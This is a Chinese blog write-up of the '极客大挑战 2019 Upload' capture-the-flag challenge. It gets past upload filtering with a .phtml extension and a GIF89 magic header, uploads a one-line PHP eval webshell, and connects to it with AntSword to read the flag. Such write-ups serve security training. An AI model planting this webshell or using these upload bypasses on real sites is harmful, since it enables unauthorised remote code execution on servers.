首页 > 其他分享 >[极客大挑战 2019]Upload 1

[极客大挑战 2019]Upload 1

时间:2024-11-08 18:41:53浏览次数:4  
标签:文件 极客 Upload 2019 php 上传

[极客大挑战 2019]Upload 1

打开实例为文件上传页面,代码审计,发现为php文件,采用php马

image-20241105121039232

采用bp抓包修改后缀绕过,上传一句话木马

<?php phpinfo(); @eval($_POST['cmd']); ?>

image-20241105121233920

回显错误,显示不能为php,存在文件类型过滤

image-20241105121321623

尝试采用phtm文件包含php绕过

image-20241105121539643

显示非image文件

image-20241105121706175

尝试采用GIF89幻术头

GIF89

image-20241105122359654

上传成功,但是并未给出回显路径,猜测为/upload/php.phtml

image-20241105122455525

访问地址成功

image-20241105122529041

蚁剑链接,密码cmd

image-20241105122625054

成功在根目录找到flag

image-20241105122728863

image-20241105122737940

标签:文件,极客,Upload,2019,php,上传
From: https://www.cnblogs.com/tazmi/p/18535692

相关文章

  • [极客大挑战 2019]Secret File 1
    [极客大挑战2019]SecretFile1代码审计发现页面/Archive_room.php访问页面点击SECRET按钮,bp抓包发现302重定向,附带一个注释页面secr3t.php访问secr3t.php,代码审计访问flag.php,发现一个贱贱的页面,确认是文件包含看不到页面且禁用../等参数,考虑用php的base64回显,paylo......
  • [极客大挑战 2019]PHP 1
    [极客大挑战2019]PHP1打开文件发现提示信息“备份文件”,查看源码并未发现其他有效信息采用dirsearch爆破目录,找到www.zip文件解压zip,发现是源码泄露提交flag,发现不正确,看到index.php源码中有Get传参,然后反序列化函数unserialize(),判断为反序列化漏洞;查看class.php可......
  • [极客大挑战 2019]LoveSQL 1
    [极客大挑战2019]LoveSQL1代码审计,发现表单方式为get提交到check.php万能密码admin'or1=1#登录成功,这边我以为密码就是flag,结果并不是,结合题目信息,猜想这应该是根据账号密码的注入尝试闭合?username=admin'and1=1%23&password=d3c9cf30a12d1f13d4f778859fb16f73正......
  • upload-labs
    upload-labs1-13upload-labs1-13upload-labs1-13pass-01pass-02pass-03pass-04pass-05pass-06pass-07pass-08pass-09pass-10pass-11pass-12pass-13pass-01首先我们新建文件a.php并用一句话木马<?php@eval($_POST['cmd']);?>然后我们上传1.php发现弹窗给出了白名......
  • Microsoft Office 2019 (office全家桶)for Mac/Windows电脑安装包
    MicrosoftOffice2019forMac(Office全家桶)是一款功能全面且强大的办公软件套件,专为Mac用户设计。Mac苹果电脑下载:Office2019(含激活秘钥)Windows电脑下载:Office2019(含批量许可)    以下是其主要特点和优势:一、界面设计采用了Mac系统的设......
  • 【漏洞复现】灵当CRM multipleUpload.php 任意文件上传漏洞
    免责声明:        本文旨在提供有关特定漏洞的信息,以帮助用户了解潜在风险。发布此信息旨在促进网络安全意识和技术进步,并非出于恶意。读者应理解,利用本文提到的漏洞或进行相关测试可能违反法律或服务协议。未经授权访问系统、网络或应用程序可能导致法律责任或严......
  • 不管你是什么客,帽客,极客,杰克,交易客,博客,博弈客,旅客…嗯那头巨鲸惊醒了,睡醒沉睡了一个世
    特朗普作为交易员的掌舵人,具有剁手的品质,他能够顺利到达彼岸的原因只有一个,他的止损打的很大,你是猜不到是多大的?全无古人的支持.没有像他这种,Comeon二进宫的人.他所惧怕的也只有一个,后面来的人,他的儿子小唐纳德.你的反应很迟钝呢,中国外交部的都在发了电报祝贺特朗普了,你还......
  • CF1270 Good Bye 2019
    Dashboard玩构造玩的,服了。A拥有最大牌的必胜。linkB若相邻的差\(\ge2\)则有解,否则根据变化连续性一定无解。linkC加两个数,第一个数为之前所有数的异或和。加进来之后异或为0。第二个数为加完第一个数之后的和。linkD考虑\(k=n-1\)时,分别询问除去每个数之后的第\(......
  • 基于Arcgis10.8+VS2019的ArcObjectsSDKNet安装
    基于Arcgis10.8+VS2019的ArcObjectsSDKNet安装首先Arcgis10.8和Arcgis10.8.1所需要的ArcObjectsSDKNet版本是不同的在使用10.8的ArcObjectsSDKNet在Arcgis10.8.1的基础上是安装不了的,会检测不到在安装Arcgis10.8的基础上,下载Arcgis10.8的ArcObjectsSDKNet,解压后进行安装连接......
  • P5308 [COCI2018-2019#4] Akvizna
    原题链接奶龙题,主要是凸性的证明,然后wqs二分求解即可。轮数的选择是\(1\)~\(n\),假如是\(1\)轮,答案显然为\(1\),为\(n\)轮,答案就是\(\sum_{i=1}^{n}i^{-1}\),从这里就可以直接猜出凸性了。然后是不考虑轮数限制的求法,直接dp即可:\(f_{i}=\max\{f_j+\frac{i-j}{i}\}\),......